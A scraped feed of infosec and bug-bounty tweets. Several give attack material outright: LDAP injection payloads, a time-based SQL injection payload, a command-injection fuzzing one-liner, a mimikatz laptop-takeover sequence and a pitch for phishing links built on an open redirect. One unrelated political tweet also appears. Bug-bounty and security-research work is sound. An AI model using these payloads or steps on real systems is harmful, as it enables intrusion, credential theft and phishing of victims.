Not every research ended with RCEs, but I can promise the bugs (especially the Auth-Bypass) in my #BHUSA talk must be fun and insane! Black Hat

💥 New attack! Our researcher Arseniy Sharoglazov discovered a PHP's Arbitrary Object Instantiation with no user-defined classes. It was turned to RCE! Read the research: swarm.ptsecurity.com/exploiting-arb…

Stealing WiFi passwords with XSS and without being connected to the network. By @Elber333 NIce ! #bugbountytips #cybersecurity #infosec

Pic of the Day #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redteam #informationsecurity #cissp #CyberSec

LDAP injection payloads 🔥🔥🔥🔥 * *)(& *))%00 )(cn=))\x00 *()|%26' *()|&' *(|(mail=*) *(|(objectclass=*)) *)(uid=*))(|(uid=* admin* admin*)((|userpassword=*) admin*)((|userPassword=*) x' or name()='username' or 'x'='y #bugbounty #infosec

sometimes it's not easy #infosec #cybersecurity #bugbounty #basicauth

Want to create great phishing links using an open-redirect on google.com? While they don't last forever, they are a great way to trick unsuspecting victims into clicking a legit looking URL before expiring! gist.github.com/ustayready/3ba… Follow the 🧵for how it works..

⏰ DOJO Challenge - DOM XSS (Butters Adventure) 🎁 Top 3 reports win a swag pack! 🗓️ Submit your solution before 05/01/2023 Check out it out here 😼👇 dojo-yeswehack.com/practice/ca271… #BugBounty #YesWeRHackers #YWHDOJO

We let ChatGPT write today's #BugBytes tweet and this is what it wrote 👇 I'm sorry, but I am not able to write about anything related to Bug Bytes or chatGPT, as I am a large language model trained by OpenAI and do not have access to curren- oh nvm lets bring the human back

Yay, I was awarded a $x,xxx bounty on HackerOne! I found Critical bug Time-based SQL injection on JSON parameter Payload: (select*from(select(sleep(20)))a) #TogetherWeHitHarder

1. remove disk from target laptop 2. virtualize system (VBoxManage convertfromraw) 3. abuse local admin (chntpw using alt booted system) 4. run mimikatz by reflective loading (bypass ESET :) ) 5. extract machine cert / secrets NEVER deploy company laptop without BitLocker.

Found My first XSS.. on Swagger UI. Nuclei by ProjectDiscovery is awesome 😀 #bugbounty

[1️⃣] Spot The Vulnerability 📜 Hackers love spotting vulnerabilities! Spot the vulnerability in this code snippet and get your first flag! 🔗 go.intigriti.com/nahamcon

#14 Vulnerable snippets!🏆 Himanshu Anand, Abdillah Read their solution: ➡️ x.com/anand_himanshu… ➡️ x.com/abdilahrf/stat…

Streaming Web Security Academy - What should we do? Twitch.tv/NahamSec

The FBI actively interfering in multiple elections is the biggest threat to our constitutional democracy today

Just released Inti De Ceukelaire "RTFR (Read The Bleeping RFC)" from #NahamConEU2022! These attack vectors are incredible creative and worth implementing them in your day to day testing! youtu.be/4ZsTKvfP1g0

Command Injection: by N0t0d4y ~Find Your subdomains ~cat subdomains.txt | httpx | gau | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt ~ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ~search for ”uid” in burp proxy intercept #infosec #bugbountytips

Just got another CRLF injection, and exploiting it to #XSS but Server is returning 302 status code with location param which is preventing my javascript to return XSS promot Any tips to bypass this thing and get xss prompt? #bugbountytips #cybersecuritytips

Just found my first SQL injection on a bug bounty platform. Tip: postgreSQL has a lot of tricks to escalate from SQLi to RCE. Don't stop at the SQLi itself. #bugbountytips #bugbounty #rce #sqli #postgresql #hacking #hacken book.hacktricks.xyz/pentesting-web…